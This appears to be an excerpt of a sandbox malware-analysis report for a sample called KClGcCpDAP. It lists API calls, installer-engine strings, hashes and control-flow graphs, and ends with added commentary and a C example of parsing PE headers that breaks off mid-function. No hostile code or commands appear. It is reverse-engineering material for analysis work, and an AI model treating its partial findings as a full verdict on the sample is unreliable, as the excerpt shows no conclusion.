                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00875317
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00875321
                                                            • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0087558E
                                                            Strings
                                                            • Failed to run untrusted mode., xrefs: 008754B6
                                                            • Failed to get OS info., xrefs: 0087534F
                                                            • Failed to parse command line., xrefs: 00875245
                                                            • Failed to initialize XML util., xrefs: 008752F9
                                                            • Failed to initialize Regutil., xrefs: 008752C9
                                                            • Failed to initialize Cryputil., xrefs: 008752A6
                                                            • Failed to run per-user mode., xrefs: 00875494
                                                            • Failed to initialize core., xrefs: 008753C3
                                                            • Failed to run per-machine mode., xrefs: 0087546C
                                                            • engine.cpp, xrefs: 00875345
                                                            • Failed to initialize COM., xrefs: 00875291
                                                            • Failed to run RunOnce mode., xrefs: 0087541C
                                                            • Invalid run mode., xrefs: 008753F9
                                                            • Failed to initialize Wiutil., xrefs: 008752E1
                                                            • Failed to initialize engine state., xrefs: 0087526C
                                                            • 3.11.1.2318, xrefs: 00875384
                                                            • Failed to run embedded mode., xrefs: 00875444
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                            • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                            • API String ID: 3262001429-510904028
                                                            • Opcode ID: 100f24e6dcb69568833f5140da9a70c70ae03e229f5017700eb0e19b6223da63
                                                            • Instruction ID: cda1ea1926bd89b3ec170d61edeea60a583138ebf2b6c81cb5f45f94ae310720
                                                            • Opcode Fuzzy Hash: 100f24e6dcb69568833f5140da9a70c70ae03e229f5017700eb0e19b6223da63
                                                            • Instruction Fuzzy Hash: 29B18172D40A299BDB31AB688C46BED76A5FF04710F0481A5E90CF6355DBB4DE80CB92
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,008B3609,00000000,?,00000000), ref: 008B3069
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0089C025,?,00875405,?,00000000,?), ref: 008B3075
                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 008B30B5
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008B30C1
                                                            • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 008B30CC
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008B30D6
                                                            • CoCreateInstance.OLE32(008DB6B8,00000000,00000001,008BB818,?,?,?,?,?,?,?,?,?,?,?,0089C025), ref: 008B3111
                                                            • ExitProcess.KERNEL32 ref: 008B31C0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                            • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                            • API String ID: 2124981135-499589564
                                                            • Opcode ID: c6c9657dae5376fbef77dc875bec7684cbb7335b703da1fce8af9c94dd2a4467
                                                            • Instruction ID: 8a29cc804be5291da5eb979eb479a4c709626b0b1017b68dafc058d24fcaf8b9
                                                            • Opcode Fuzzy Hash: c6c9657dae5376fbef77dc875bec7684cbb7335b703da1fce8af9c94dd2a4467
                                                            • Instruction Fuzzy Hash: 36419E31A01619ABDB24ABAC8845BEEB7B8FF44710F114279F901EB340DBB1DE458B90
                                                            APIs
                                                              • Part of subcall function 008733C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008710DD,?,00000000), ref: 008733E8
                                                            • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 008710F6
                                                              • Part of subcall function 00871175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 00871186
                                                              • Part of subcall function 00871175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 00871191
                                                              • Part of subcall function 00871175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0087119F
                                                              • Part of subcall function 00871175: GetLastError.KERNEL32(?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 008711BA
                                                              • Part of subcall function 00871175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008711C2
                                                              • Part of subcall function 00871175: GetLastError.KERNEL32(?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 008711D7
                                                            • CloseHandle.KERNELBASE(?,?,?,?,008BB4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00871131
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                            • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                            • API String ID: 3687706282-3151496603
                                                            • Opcode ID: 8316ffd70a3ed8ab8a70f7cf098d8b64ab8633b1f73859007b7d95d7f3c51d30
                                                            • Instruction ID: ed183ed6e4af68542f5e891626bf04434d471ec346dd4356171fed6ce6e695fc
                                                            • Opcode Fuzzy Hash: 8316ffd70a3ed8ab8a70f7cf098d8b64ab8633b1f73859007b7d95d7f3c51d30
                                                            • Instruction Fuzzy Hash: 2821517190021CABDB109FA8DC49BEEBBB8FB05710F508115EA14FB285D7B099088BB5
                                                            Strings
                                                            • Failed to calculate working folder to ensure it exists., xrefs: 0088A0D8
                                                            • Failed create working folder., xrefs: 0088A0EE
                                                            • Failed to copy working folder., xrefs: 0088A116
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryErrorLastProcessWindows
                                                            • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                            • API String ID: 3841436932-2072961686
                                                            • Opcode ID: 84de0117d38682e4fce43554dd2dbe621327b48a4082e457bbee36474afbbfde
                                                            • Instruction ID: eff7ea0100f31a87c81ff195369bea1c7b8467e7b675414b22fb4e859de107c8
                                                            • Opcode Fuzzy Hash: 84de0117d38682e4fce43554dd2dbe621327b48a4082e457bbee36474afbbfde
                                                            • Instruction Fuzzy Hash: 5E01FC32901529FB9B227B59DC0AC9EBB79FF54720B104266F801F6350EB35DE10E792
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,008A48AE,00000000,008D7F08,0000000C,008A4A05,00000000,00000002,00000000), ref: 008A48F9
                                                            • TerminateProcess.KERNEL32(00000000,?,008A48AE,00000000,008D7F08,0000000C,008A4A05,00000000,00000002,00000000), ref: 008A4900
                                                            • ExitProcess.KERNEL32 ref: 008A4912
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 0508333362a70382f6fbfe88d22991dd0c2975605fa40038972ca35e95f68960
                                                            • Instruction ID: 29d1459e950e8c54399f5e6c0ed8ded395a587db6980037a14529ecf35eb5293
                                                            • Opcode Fuzzy Hash: 0508333362a70382f6fbfe88d22991dd0c2975605fa40038972ca35e95f68960
                                                            • Instruction Fuzzy Hash: A0E0B631400248ABDF11AF58DD09A9A3F69FF86791B049124F8598A632CBB9DD62CA91
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateProcess
                                                            • String ID:
                                                            • API String ID: 1357844191-0
                                                            • Opcode ID: ccd7a9500b379d8dadb2bf963887cb3e7ee4ca401640d6c4d654741798eeb969
                                                            • Instruction ID: 6f6675610a670839bceaae894d44677a50c86dab35ee8bdf04fbc608408a7541
                                                            • Opcode Fuzzy Hash: ccd7a9500b379d8dadb2bf963887cb3e7ee4ca401640d6c4d654741798eeb969
                                                            • Instruction Fuzzy Hash: 58C012321A420CAB8B006FF8EC0EC9A3BACBB286027048610B906C3120C778E0108B60
                                                            APIs
                                                            • SysFreeString.OLEAUT32(00000000), ref: 0087E058
                                                            • SysFreeString.OLEAUT32(00000000), ref: 0087E736
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeHeapString$AllocateProcess
                                                            • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`<u$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                            • API String ID: 336948655-2953049543
                                                            • Opcode ID: 5dcae76dd318d9267324fc625fc270cf4f47a5fed76e35e51cac652877df4a1a
                                                            • Instruction ID: 6cae8d050175ac77aed66507fc27f629245c5a00f84e41b981efefc8fa849351
                                                            • Opcode Fuzzy Hash: 5dcae76dd318d9267324fc625fc270cf4f47a5fed76e35e51cac652877df4a1a
                                                            • Instruction Fuzzy Hash: D232A431D4021AEBCB219B64CC41FAEB6B4FB18764F1482A9E928FB295D774DD00DB91

                                                            Control-flow Graph

                                                            control_flow_graph 222 87f9e3-87fa14 call 8b39af 225 87fa16 222->225 226 87fa18-87fa1a 222->226 225->226 227 87fa2e-87fa47 call 8b32f3 226->227 228 87fa1c-87fa29 call 8b0237 226->228 234 87fa53-87fa68 call 8b32f3 227->234 235 87fa49-87fa4e 227->235 233 87ff16-87ff1b 228->233 236 87ff23-87ff28 233->236 237 87ff1d-87ff1f 233->237 247 87fa74-87fa81 call 87ea42 234->247 248 87fa6a-87fa6f 234->248 238 87ff0d-87ff14 call 8b0237 235->238 241 87ff30-87ff35 236->241 242 87ff2a-87ff2c 236->242 237->236 250 87ff15 238->250 245 87ff37-87ff39 241->245 246 87ff3d-87ff41 241->246 242->241 245->246 251 87ff43-87ff46 call 8b5636 246->251 252 87ff4b-87ff52 246->252 255 87fa83-87fa88 247->255 256 87fa8d-87faa2 call 8b32f3 247->256 248->238 250->233 251->252 255->238 259 87faa4-87faa9 256->259 260 87faae-87fac0 call 8b4c97 256->260 259->238 263 87fac2-87faca 260->263 264 87facf-87fae4 call 8b32f3 260->264 265 87fd99-87fda2 call 8b0237 263->265 270 87fae6-87faeb 264->270 271 87faf0-87fb05 call 8b32f3 264->271 265->250 270->238 274 87fb07-87fb0c 271->274 275 87fb11-87fb23 call 8b3505 271->275 274->238 278 87fb25-87fb2a 275->278 279 87fb2f-87fb45 call 8b39af 275->279 278->238 282 87fdf4-87fe0e call 87ecbe 279->282 283 87fb4b-87fb4d 279->283 289 87fe10-87fe15 282->289 290 87fe1a-87fe32 call 8b39af 282->290 284 87fb4f-87fb54 283->284 285 87fb59-87fb6e call 8b3505 283->285 284->238 292 87fb70-87fb75 285->292 293 87fb7a-87fb8f call 8b32f3 285->293 289->238 298 87fefc-87fefd call 87f0f8 290->298 299 87fe38-87fe3a 290->299 292->238 300 87fb91-87fb93 293->300 301 87fb9f-87fbb4 call 8b32f3 293->301 308 87ff02-87ff06 298->308 302 87fe46-87fe64 call 8b32f3 299->302 303 87fe3c-87fe41 299->303 300->301 305 87fb95-87fb9a 300->305 312 87fbb6-87fbb8 301->312 313 87fbc4-87fbd9 call 8b32f3 301->313 314 87fe66-87fe6b 302->314 315 87fe70-87fe88 call 8b32f3 302->315 303->238 305->238 308->250 311 87ff08 308->311 311->238 312->313 316 87fbba-87fbbf 
312->316 323 87fbdb-87fbdd 313->323 324 87fbe9-87fbfe call 8b32f3 313->324 314->238 321 87fe95-87fead call 8b32f3 315->321 322 87fe8a-87fe8c 315->322 316->238 331 87feaf-87feb1 321->331 332 87feba-87fed2 call 8b32f3 321->332 322->321 327 87fe8e-87fe93 322->327 323->324 328 87fbdf-87fbe4 323->328 333 87fc00-87fc02 324->333 334 87fc0e-87fc23 call 8b32f3 324->334 327->238 328->238 331->332 335 87feb3-87feb8 331->335 341 87fed4-87fed9 332->341 342 87fedb-87fef3 call 8b32f3 332->342 333->334 336 87fc04-87fc09 333->336 343 87fc25-87fc27 334->343 344 87fc33-87fc48 call 8b32f3 334->344 335->238 336->238 341->238 342->298 350 87fef5-87fefa 342->350 343->344 346 87fc29-87fc2e 343->346 351 87fc4a-87fc4c 344->351 352 87fc58-87fc6d call 8b32f3 344->352 346->238 350->238 351->352 354 87fc4e-87fc53 351->354 356 87fc6f-87fc71 352->356 357 87fc7d-87fc92 call 8b32f3 352->357 354->238 356->357 358 87fc73-87fc78 356->358 361 87fc94-87fc96 357->361 362 87fca2-87fcba call 8b32f3 357->362 358->238 361->362 363 87fc98-87fc9d 361->363 366 87fcbc-87fcbe 362->366 367 87fcca-87fce2 call 8b32f3 362->367 363->238 366->367 368 87fcc0-87fcc5 366->368 371 87fce4-87fce6 367->371 372 87fcf2-87fd07 call 8b32f3 367->372 368->238 371->372 373 87fce8-87fced 371->373 376 87fda7-87fda9 372->376 377 87fd0d-87fd2a CompareStringW 372->377 373->238 378 87fdb4-87fdb6 376->378 379 87fdab-87fdb2 376->379 380 87fd34-87fd49 CompareStringW 377->380 381 87fd2c-87fd32 377->381 382 87fdc2-87fdda call 8b3505 378->382 383 87fdb8-87fdbd 378->383 379->378 385 87fd57-87fd6c CompareStringW 380->385 386 87fd4b-87fd55 380->386 384 87fd75-87fd7a 381->384 382->282 392 87fddc-87fdde 382->392 383->238 384->378 388 87fd6e 385->388 389 87fd7c-87fd94 call 873821 385->389 386->384 388->384 389->265 394 87fde0-87fde5 392->394 395 87fdea 392->395 394->238 395->282
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: StringVariant$AllocClearFreeInit
                                                            • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                            • API String ID: 760788290-2956246334
                                                            • Opcode ID: 13f96c77c210af29925a1f709432fc55cec9d2b79dd9a46c34c20a940cd020b5
                                                            • Instruction ID: f1503f23af40e07fbef432d11911aab5dc66b1a63adbaab3f0c9ec49722e17ec
                                                            • Opcode Fuzzy Hash: 13f96c77c210af29925a1f709432fc55cec9d2b79dd9a46c34c20a940cd020b5
                                                            • Instruction Fuzzy Hash: C5E1E632E4466ABACB229665CC46FADB664FF01714F108236FA29F635BCF74DD0096C1

                                                            Control-flow Graph

                                                            control_flow_graph 396 87b48b-87b500 call 89f8e0 * 2 401 87b502-87b50c GetLastError 396->401 402 87b538-87b53e 396->402 403 87b50e-87b517 401->403 404 87b519 401->404 405 87b542-87b554 SetFilePointerEx 402->405 406 87b540 402->406 403->404 407 87b520-87b52d call 873821 404->407 408 87b51b 404->408 409 87b556-87b560 GetLastError 405->409 410 87b588-87b5a2 ReadFile 405->410 406->405 426 87b532-87b533 407->426 408->407 414 87b562-87b56b 409->414 415 87b56d 409->415 411 87b5a4-87b5ae GetLastError 410->411 412 87b5d9-87b5e0 410->412 418 87b5b0-87b5b9 411->418 419 87b5bb 411->419 421 87bbd7-87bbeb call 873821 412->421 422 87b5e6-87b5ef 412->422 414->415 416 87b574-87b586 call 873821 415->416 417 87b56f 415->417 416->426 417->416 418->419 424 87b5c2-87b5d4 call 873821 419->424 425 87b5bd 419->425 441 87bbf0 421->441 422->421 428 87b5f5-87b605 SetFilePointerEx 422->428 424->426 425->424 433 87bbf1-87bbf7 call 8b0237 426->433 429 87b607-87b611 GetLastError 428->429 430 87b63c-87b654 ReadFile 428->430 436 87b613-87b61c 429->436 437 87b61e 429->437 438 87b656-87b660 GetLastError 430->438 439 87b68b-87b692 430->439 449 87bbf8-87bc0a call 89e06f 433->449 436->437 445 87b625-87b632 call 873821 437->445 446 87b620 437->446 447 87b662-87b66b 438->447 448 87b66d 438->448 443 87bbbc-87bbd5 call 873821 439->443 444 87b698-87b6a2 439->444 441->433 443->441 444->443 450 87b6a8-87b6cb SetFilePointerEx 444->450 445->430 446->445 447->448 453 87b674-87b681 call 873821 448->453 454 87b66f 448->454 456 87b702-87b71a ReadFile 450->456 457 87b6cd-87b6d7 GetLastError 450->457 453->439 454->453 464 87b751-87b769 ReadFile 456->464 465 87b71c-87b726 GetLastError 456->465 462 87b6e4 457->462 463 87b6d9-87b6e2 457->463 469 87b6e6 462->469 470 87b6eb-87b6f8 call 873821 462->470 463->462 467 87b7a0-87b7bb SetFilePointerEx 464->467 468 87b76b-87b775 GetLastError 464->468 471 87b733 465->471 472 87b728-87b731 465->472 478 87b7f5-87b814 
ReadFile 467->478 479 87b7bd-87b7c7 GetLastError 467->479 475 87b777-87b780 468->475 476 87b782 468->476 469->470 470->456 473 87b735 471->473 474 87b73a-87b747 call 873821 471->474 472->471 473->474 474->464 475->476 485 87b784 476->485 486 87b789-87b796 call 873821 476->486 483 87bb7d-87bb87 GetLastError 478->483 484 87b81a-87b81c 478->484 480 87b7d4 479->480 481 87b7c9-87b7d2 479->481 488 87b7d6 480->488 489 87b7db-87b7eb call 873821 480->489 481->480 493 87bb94 483->493 494 87bb89-87bb92 483->494 491 87b81d-87b824 484->491 485->486 486->467 488->489 489->478 498 87b82a-87b836 491->498 499 87bb58-87bb75 call 873821 491->499 495 87bb96 493->495 496 87bb9b-87bbb1 call 873821 493->496 494->493 495->496 514 87bbb2-87bbba call 8b0237 496->514 503 87b841-87b84a 498->503 504 87b838-87b83f 498->504 515 87bb7a-87bb7b 499->515 509 87b850-87b876 ReadFile 503->509 510 87bb1b-87bb32 call 873821 503->510 504->503 507 87b884-87b88b 504->507 511 87b8b4-87b8cb call 87394f 507->511 512 87b88d-87b8af call 873821 507->512 509->483 516 87b87c-87b882 509->516 522 87bb37-87bb3d call 8b0237 510->522 526 87b8ef-87b904 SetFilePointerEx 511->526 527 87b8cd-87b8ea call 873821 511->527 512->515 514->449 515->514 516->491 532 87bb43-87bb44 522->532 530 87b906-87b910 GetLastError 526->530 531 87b944-87b969 ReadFile 526->531 527->433 536 87b912-87b91b 530->536 537 87b91d 530->537 533 87b9a0-87b9ac 531->533 534 87b96b-87b975 GetLastError 531->534 538 87bb45-87bb47 532->538 541 87b9cf-87b9d3 533->541 542 87b9ae-87b9ca call 873821 533->542 539 87b977-87b980 534->539 540 87b982 534->540 536->537 543 87b924-87b934 call 873821 537->543 544 87b91f 537->544 538->449 547 87bb4d-87bb53 call 873a16 538->547 539->540 548 87b984 540->548 549 87b989-87b99e call 873821 540->549 545 87b9d5-87ba09 call 873821 call 8b0237 541->545 546 87ba0e-87ba21 call 8b4a05 541->546 542->522 558 87b939-87b93f call 8b0237 543->558 544->543 545->538 565 87ba23-87ba28 546->565 566 87ba2d-87ba37 546->566 547->449 548->549 
549->558 558->532 565->558 569 87ba41-87ba49 566->569 570 87ba39-87ba3f 566->570 572 87ba55-87ba58 569->572 573 87ba4b-87ba53 569->573 571 87ba5a-87baba call 87394f 570->571 576 87bade-87baff call 89f360 call 87b208 571->576 577 87babc-87bad8 call 873821 571->577 572->571 573->571 576->538 584 87bb01-87bb11 call 873821 576->584 577->576 584->510
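The SetFilePointerEx/ReadFile sequence listed under APIs for this function (a 0x40-byte read at file offset 0, a seek, a 0x18-byte read, two 4-byte reads, then further seeks and reads, each followed by GetLastError on failure) has the shape of a PE header walk: an IMAGE_DOS_HEADER is 0x40 bytes, and the "PE\0\0" signature plus IMAGE_FILE_HEADER is 0x18 bytes. The strings elsewhere in this report (engine.cpp, package.cpp, registration.cpp, version 3.11.1.2318) are consistent with a WiX Burn bootstrapper, whose engine reads its own executable's section table at startup; that attribution is an inference from the strings, not something the report states. The block below is an added example, not code from the report or from the sample, that performs that header walk over a constructed in-memory PE32 image with no Windows headers, so it runs on any host. The image layout, the section names, the read_at helper (standing in for SetFilePointerEx+ReadFile) and the sample_section_raw_offset wrapper are assumptions made for the example; the two 4-byte reads the report lists are not reproduced.

```c
/* Added example: PE32 header walk to the section table over a constructed
 * in-memory image. Not the sample's code; layout and names are assumed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DOS_HEADER_SIZE   0x40  /* IMAGE_DOS_HEADER: first read in the report */
#define PE_SIG_FILEHDR    0x18  /* "PE\0\0" + IMAGE_FILE_HEADER: second read */
#define SECTION_HDR_SIZE  0x28  /* IMAGE_SECTION_HEADER */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = v & 0xFF; p[1] = v >> 8; }
static void wr32(uint8_t *p, uint32_t v) {
    p[0] = v & 0xFF; p[1] = (v >> 8) & 0xFF; p[2] = (v >> 16) & 0xFF; p[3] = (v >> 24) & 0xFF;
}

/* Stand-in for SetFilePointerEx+ReadFile: bounds-checked read at an offset.
 * Returns 0 on a short read, which is the failure path the report's
 * GetLastError calls handle after every seek and read. */
static int read_at(const uint8_t *img, size_t len, size_t off, size_t n, const uint8_t **out) {
    if (off > len || n > len - off) return 0;
    *out = img + off;
    return 1;
}

/* Walks DOS header -> e_lfanew -> PE signature/file header -> section table
 * and looks a section up by name. Returns 1 and fills raw offset/size. */
int pe_find_section(const uint8_t *img, size_t len, const char *name,
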